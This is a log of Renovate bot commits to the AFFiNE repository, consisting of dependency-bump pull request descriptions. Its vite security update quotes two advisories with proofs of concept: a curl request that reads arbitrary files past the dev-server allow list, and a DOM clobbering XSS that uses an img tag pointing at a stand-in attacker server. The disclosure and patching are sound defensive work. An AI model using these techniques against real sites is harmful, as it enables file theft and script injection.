- [#​13902](https://redirect.github.com/nestjs/nest/pull/13902 ) chore(deps-dev): bump artillery from 2.0.19 to 2.0.20 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13884](https://redirect.github.com/nestjs/nest/pull/13884 ) chore(deps-dev): bump mongoose from 8.5.2 to 8.5.3 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13885](https://redirect.github.com/nestjs/nest/pull/13885 ) chore(deps-dev): bump lint-staged from 15.2.8 to 15.2.9 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13890](https://redirect.github.com/nestjs/nest/pull/13890 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.2.0 to 22.3.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
##### Committers: 3
- Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec ))
- Micael Levi L. Cavalcante ([@​micalevisk](https://redirect.github.com/micalevisk ))
- [@​haouvw](https://redirect.github.com/haouvw )
</details>
<details>
<summary>nestjs/nest (@​nestjs/websockets)</summary>
### [`v10.4.3`](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.2...v10.4.3 )
### [`v10.4.2`](https://redirect.github.com/nestjs/nest/releases/tag/v10.4.2 )
[Compare Source](https://redirect.github.com/nestjs/nest/compare/v10.4.1...v10.4.2 )
##### v10.4.2 (2024-09-16)
##### Dependencies
- `common`, `core`, `microservices`, `platform-express`, `platform-fastify`, `platform-socket.io`, `platform-ws`, `testing`, `websockets`
- [#​13911](https://redirect.github.com/nestjs/nest/pull/13911 ) chore(deps): bump tslib from 2.6.3 to 2.7.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- `platform-fastify`
- [#​13938](https://redirect.github.com/nestjs/nest/pull/13938 ) chore(deps): bump light-my-request from 5.13.0 to 6.0.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- Other
- [#​13936](https://redirect.github.com/nestjs/nest/pull/13936 ) chore(deps-dev): bump lint-staged from 15.2.9 to 15.2.10 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13946](https://redirect.github.com/nestjs/nest/pull/13946 ) chore(deps): bump webpack and [@​nestjs/cli](https://redirect.github.com/nestjs/cli ) in /sample/02-gateways ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13947](https://redirect.github.com/nestjs/nest/pull/13947 ) chore(deps-dev): bump webpack from 5.91.0 to 5.94.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13966](https://redirect.github.com/nestjs/nest/pull/13966 ) chore(deps): bump dset from 3.1.2 to 3.1.4 in /sample/32-graphql-federation-schema-first/gateway ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13967](https://redirect.github.com/nestjs/nest/pull/13967 ) chore(deps): bump dset from 3.1.3 to 3.1.4 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13968](https://redirect.github.com/nestjs/nest/pull/13968 ) chore(deps-dev): bump [@​commitlint/cli](https://redirect.github.com/commitlint/cli ) from 19.4.0 to 19.5.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13969](https://redirect.github.com/nestjs/nest/pull/13969 ) chore(deps-dev): bump mongoose from 8.6.0 to 8.6.2 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13973](https://redirect.github.com/nestjs/nest/pull/13973 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.5.1 to 22.5.5 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13922](https://redirect.github.com/nestjs/nest/pull/13922 ) chore(deps): bump [@​apollo/gateway](https://redirect.github.com/apollo/gateway ) from 2.2.3 to 2.9.0 in /sample/31-graphql-federation-code-first/users-application ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13921](https://redirect.github.com/nestjs/nest/pull/13921 ) chore(deps): bump [@​apollo/query-planner](https://redirect.github.com/apollo/query-planner ) from 2.4.8 to 2.9.0 in /sample/31-graphql-federation-code-first/posts-application ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13926](https://redirect.github.com/nestjs/nest/pull/13926 ) chore(deps-dev): bump mongoose from 8.5.3 to 8.6.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13928](https://redirect.github.com/nestjs/nest/pull/13928 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.5.0 to 22.5.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13929](https://redirect.github.com/nestjs/nest/pull/13929 ) chore(deps-dev): bump [@​commitlint/config-angular](https://redirect.github.com/commitlint/config-angular ) from 19.3.0 to 19.4.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13893](https://redirect.github.com/nestjs/nest/pull/13893 ) chore(deps-dev): bump [@​typescript-eslint/eslint-plugin](https://redirect.github.com/typescript-eslint/eslint-plugin ) from 7.18.0 to 8.2.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13896](https://redirect.github.com/nestjs/nest/pull/13896 ) chore(deps-dev): bump husky from 9.1.4 to 9.1.5 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13897](https://redirect.github.com/nestjs/nest/pull/13897 ) chore(deps-dev): bump core-js from 3.38.0 to 3.38.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13901](https://redirect.github.com/nestjs/nest/pull/13901 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.3.0 to 22.5.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13902](https://redirect.github.com/nestjs/nest/pull/13902 ) chore(deps-dev): bump artillery from 2.0.19 to 2.0.20 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13884](https://redirect.github.com/nestjs/nest/pull/13884 ) chore(deps-dev): bump mongoose from 8.5.2 to 8.5.3 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13885](https://redirect.github.com/nestjs/nest/pull/13885 ) chore(deps-dev): bump lint-staged from 15.2.8 to 15.2.9 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
- [#​13890](https://redirect.github.com/nestjs/nest/pull/13890 ) chore(deps-dev): bump [@​types/node](https://redirect.github.com/types/node ) from 22.2.0 to 22.3.0 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot ))
##### Committers: 3
- Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec ))
- Micael Levi L. Cavalcante ([@​micalevisk](https://redirect.github.com/micalevisk ))
- [@​haouvw](https://redirect.github.com/haouvw )
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions ) if that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguODAuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-19 06:09:17 +00:00
renovate
04639e4263
chore: bump up vite version to v5.4.6 [SECURITY] ( #8271 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [vite](https://vitejs.dev ) ([source](https://redirect.github.com/vitejs/vite/tree/HEAD/packages/vite )) | [`5.4.4` -> `5.4.6`](https://renovatebot.com/diffs/npm/vite/5.4.4/5.4.6 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) |
### GitHub Vulnerability Alerts
#### [CVE-2024-45811](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-9cwx-2883-4wfx )
### Summary
The contents of arbitrary files can be returned to the browser.
### Details
`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.
### PoC
```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
$ echo "top secret content" > /tmp/secret.txt
# expected behaviour
$ curl "http://localhost:5173/@​fs/tmp/secret.txt "
<body>
<h1>403 Restricted</h1>
<p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.
# security bypassed
$ curl "http://localhost:5173/@​fs/tmp/secret.txt?import&raw "
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```
#### [CVE-2024-45812](https://redirect.github.com/vitejs/vite/security/advisories/GHSA-64vr-g452-qvp3 )
### Summary
We discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.
Note that, we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986
### Details
**Backgrounds**
DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:
[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/
**Gadgets found in Vite**
We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`.
However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.
```
const relativeUrlMechanisms = {
amd: (relativePath) => {
if (relativePath[0] !== ".") relativePath = "./" + relativePath;
return getResolveUrl(
`require.toUrl('${escapeId(relativePath)}'), document.baseURI`
);
},
cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
relativePath
)} : ${getRelativeUrlFromDocument(relativePath)})`,
es: (relativePath) => getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
),
iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
// NOTE: make sure rollup generate `module` params
system: (relativePath) => getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
),
umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
relativePath
)} : ${getRelativeUrlFromDocument(relativePath, true)})`
};
```
### PoC
Considering a website that contains the following `main.js` script, the devloper decides to use the Vite to bundle up the program with the following configuration.
```
// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)
```
```
// extra.js
export default "https://myserver/justAnOther.js "
```
```
// vite.config.js
import { defineConfig } from 'vite'
export default defineConfig({
build: {
assetsInlineLimit: 0, // To avoid inline assets for PoC
rollupOptions: {
output: {
format: "cjs"
},
},
},
base: "./",
});
```
After running the build command, the developer will get following bundle as the output.
```
// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);
```
Adding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.
```
<!DOCTYPE html>
<html>
<head>
<title>Vite Example</title>
<!-- Attacker-controlled Script-less HTML Element starts--!>
<img name="currentScript" src="https://attacker.controlled.server/ "></img>
<!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>
```
### Impact
This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.
### Patch
```
// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
getResolveUrl(
`'${escapeId(partialEncodeURIPath(relativePath))}', ${
umd ? `typeof document === 'undefined' ? location.href : ` : ''
}document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
)
```
---
### Release Notes
<details>
<summary>vitejs/vite (vite)</summary>
### [`v5.4.6`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.6 )
[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.5...v5.4.6 )
Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.6/packages/vite/CHANGELOG.md ) for details.
### [`v5.4.5`](https://redirect.github.com/vitejs/vite/releases/tag/v5.4.5 )
[Compare Source](https://redirect.github.com/vitejs/vite/compare/v5.4.4...v5.4.5 )
Please refer to [CHANGELOG.md](https://redirect.github.com/vitejs/vite/blob/v5.4.5/packages/vite/CHANGELOG.md ) for details.
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/ ). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE ).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiIzOC44MC4wIiwidXBkYXRlZEluVmVyIjoiMzguODAuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=-->
2024-09-19 05:53:05 +00:00
renovate
a372ab339b
chore: bump up all non-major dependencies ( #8237 )
...
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence | Type | Update |
|---|---|---|---|---|---|---|---|
| [@atlaskit/pragmatic-drag-and-drop](https://atlassian.design/components/pragmatic-drag-and-drop/ ) ([source](https://redirect.github.com/atlassian/pragmatic-drag-and-drop )) | [`1.3.0` -> `1.3.1`](https://renovatebot.com/diffs/npm/@atlaskit%2fpragmatic-drag-and-drop/1.3.0/1.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@aws-sdk/client-s3](https://redirect.github.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://redirect.github.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.651.0` -> `3.654.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.651.0/3.654.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [@aws-sdk/client-s3](https://redirect.github.com/aws/aws-sdk-js-v3/tree/main/clients/client-s3 ) ([source](https://redirect.github.com/aws/aws-sdk-js-v3/tree/HEAD/clients/client-s3 )) | [`3.651.0` -> `3.654.0`](https://renovatebot.com/diffs/npm/@aws-sdk%2fclient-s3/3.651.0/3.654.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@faker-js/faker](https://redirect.github.com/faker-js/faker ) | [`9.0.0` -> `9.0.1`](https://renovatebot.com/diffs/npm/@faker-js%2ffaker/9.0.0/9.0.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@floating-ui/dom](https://floating-ui.com ) ([source](https://redirect.github.com/floating-ui/floating-ui/tree/HEAD/packages/dom )) | [`1.6.10` -> `1.6.11`](https://renovatebot.com/diffs/npm/@floating-ui%2fdom/1.6.10/1.6.11 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [@playwright/test](https://playwright.dev ) ([source](https://redirect.github.com/microsoft/playwright )) | [`=1.47.0` -> `=1.47.1`](https://renovatebot.com/diffs/npm/@playwright%2ftest/1.47.0/1.47.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@slack/web-api](https://slack.dev/node-slack-sdk/web-api ) ([source](https://redirect.github.com/slackapi/node-slack-sdk )) | [`7.4.0` -> `7.5.0`](https://renovatebot.com/diffs/npm/@slack%2fweb-api/7.4.0/7.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [@storybook/addon-essentials](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/essentials ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/essentials )) | [`8.3.0` -> `8.3.1`](https://renovatebot.com/diffs/npm/@storybook%2faddon-essentials/8.3.0/8.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-interactions](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/interactions ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/interactions )) | [`8.3.0` -> `8.3.1`](https://renovatebot.com/diffs/npm/@storybook%2faddon-interactions/8.3.0/8.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-links](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/links ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/links )) | [`8.3.0` -> `8.3.1`](https://renovatebot.com/diffs/npm/@storybook%2faddon-links/8.3.0/8.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/addon-mdx-gfm](https://redirect.github.com/storybookjs/storybook/tree/next/code/addons/gfm ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/addons/gfm )) | [`8.3.0` -> `8.3.1`](https://renovatebot.com/diffs/npm/@storybook%2faddon-mdx-gfm/8.3.0/8.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/react](https://redirect.github.com/storybookjs/storybook/tree/next/code/renderers/react ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/renderers/react )) | [`8.3.0` -> `8.3.1`](https://renovatebot.com/diffs/npm/@storybook%2freact/8.3.0/8.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@storybook/react-vite](https://redirect.github.com/storybookjs/storybook/tree/next/code/frameworks/react-vite ) ([source](https://redirect.github.com/storybookjs/storybook/tree/HEAD/code/frameworks/react-vite )) | [`8.3.0` -> `8.3.1`](https://renovatebot.com/diffs/npm/@storybook%2freact-vite/8.3.0/8.3.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer )) | [`6.4.15` -> `6.4.16`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/6.4.15/6.4.16 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react ) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react )) | [`18.3.5` -> `18.3.7`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.5/18.3.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vitest/coverage-istanbul](https://redirect.github.com/vitest-dev/vitest/tree/main/packages/coverage-istanbul#readme ) ([source](https://redirect.github.com/vitest-dev/vitest/tree/HEAD/packages/coverage-istanbul )) | [`2.1.0` -> `2.1.1`](https://renovatebot.com/diffs/npm/@vitest%2fcoverage-istanbul/2.1.0/2.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [@vitest/ui](https://redirect.github.com/vitest-dev/vitest/tree/main/packages/ui#readme ) ([source](https://redirect.github.com/vitest-dev/vitest/tree/HEAD/packages/ui )) | [`2.1.0` -> `2.1.1`](https://renovatebot.com/diffs/npm/@vitest%2fui/2.1.0/2.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [anyhow](https://redirect.github.com/dtolnay/anyhow ) | `1.0.88` -> `1.0.89` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [builder-util-runtime](https://redirect.github.com/electron-userland/electron-builder ) ([source](https://redirect.github.com/electron-userland/electron-builder/tree/HEAD/packages/builder-util-runtime )) | [`9.2.6` -> `9.2.8`](https://renovatebot.com/diffs/npm/builder-util-runtime/9.2.6/9.2.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [electron](https://redirect.github.com/electron/electron ) | [`32.1.0` -> `32.1.1`](https://renovatebot.com/diffs/npm/electron/32.1.0/32.1.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [electron-updater](https://redirect.github.com/electron-userland/electron-builder ) ([source](https://redirect.github.com/electron-userland/electron-builder/tree/HEAD/packages/electron-updater )) | [`6.3.5` -> `6.3.7`](https://renovatebot.com/diffs/npm/electron-updater/6.3.5/6.3.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [embla-carousel-react](https://www.embla-carousel.com ) ([source](https://redirect.github.com/davidjerleke/embla-carousel )) | [`8.2.1` -> `8.3.0`](https://renovatebot.com/diffs/npm/embla-carousel-react/8.2.1/8.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [msw](https://mswjs.io ) ([source](https://redirect.github.com/mswjs/msw )) | [`2.4.5` -> `2.4.8`](https://renovatebot.com/diffs/npm/msw/2.4.5/2.4.8 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [nodemon](https://nodemon.io ) ([source](https://redirect.github.com/remy/nodemon )) | [`3.1.4` -> `3.1.5`](https://renovatebot.com/diffs/npm/nodemon/3.1.4/3.1.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [nx](https://nx.dev ) ([source](https://redirect.github.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.7.3` -> `19.7.4`](https://renovatebot.com/diffs/npm/nx/19.7.3/19.7.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [openai](https://redirect.github.com/openai/openai-node ) | [`4.60.0` -> `4.62.1`](https://renovatebot.com/diffs/npm/openai/4.60.0/4.62.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [piscina](https://redirect.github.com/piscinajs/piscina ) | [`4.6.1` -> `4.7.0`](https://renovatebot.com/diffs/npm/piscina/4.6.1/4.7.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [playwright](https://playwright.dev ) ([source](https://redirect.github.com/microsoft/playwright )) | [`=1.47.0` -> `=1.47.1`](https://renovatebot.com/diffs/npm/playwright/1.47.0/1.47.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [postcss](https://postcss.org/ ) ([source](https://redirect.github.com/postcss/postcss )) | [`8.4.45` -> `8.4.47`](https://renovatebot.com/diffs/npm/postcss/8.4.45/8.4.47 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [react-day-picker](https://daypicker.dev ) ([source](https://redirect.github.com/gpbl/react-day-picker )) | [`9.0.9` -> `9.1.0`](https://renovatebot.com/diffs/npm/react-day-picker/9.0.9/9.1.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
